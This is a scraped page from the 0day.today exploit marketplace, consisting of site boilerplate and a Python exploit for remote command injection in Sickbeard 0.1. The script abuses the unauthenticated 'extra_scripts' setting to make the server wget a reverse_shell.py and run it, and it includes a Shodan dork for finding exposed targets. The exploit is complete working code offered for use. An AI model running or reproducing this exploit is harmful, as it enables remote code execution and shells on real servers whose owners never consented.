0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Sickbeard 0.1 - Remote Command Injection Exploit
# Exploit Title: Sickbeard 0.1 - Remote Command Injection # Google Dork: https://www.shodan.io/search?query=sickbeard # Exploit Author: bdrake # Vendor Homepage: https://sickbeard.com/ # Software Link: https://github.com/midgetspy/Sick-Beard # Version: alpha (master) -- git : 31ceaf1b5cab1884a280fe3f4609bdc3b1fb3121 # Tested on: Fedora 32 # CVE : NA #!/usr/bin/env python3 import requests import sys HOST = 'http://localhost:8081/' # path to local video for processing # see HOST + home/postprocess PROCESS_DIR = '/directory/changeme' # Auth is disabled on default installation USERNAME = '' PASSWORD = '' # see "Extra Scripts" field. HOST + config/hidden/ # multiple commands can be entered separated by '|' CMD = 'wget -t 2 -T 1 -O /tmp/reverse_shell.py http://localhost/reverse_shell.py | python /tmp/reverse_shell.py' def post_request(url, data): try: requests.post(url=url, data=data, auth=(USERNAME, PASSWORD)) except requests.exceptions.RequestException as e: print(repr(e)) sys.exit(1) def set_extra_scripts(): data = { 'anon_redirect': 'http://dereferer.org/?', 'display_all_seasons': 'on', 'git_path': '', 'extra_scripts': CMD } post_request(HOST+'config/hidden/saveHidden', data) def process_episode(): data = { 'dir': PROCESS_DIR, 'method': 'Manual', 'force_replace': 'on' } post_request(HOST+'home/postprocess/processEpisode', data) def main(): try: print('setting scripts...') set_extra_scripts() print('processing episode. might take a few seconds...') process_episode() except KeyboardInterrupt: print('exit...') if __name__ == '__main__': main() # 0day.today [2024-11-16] #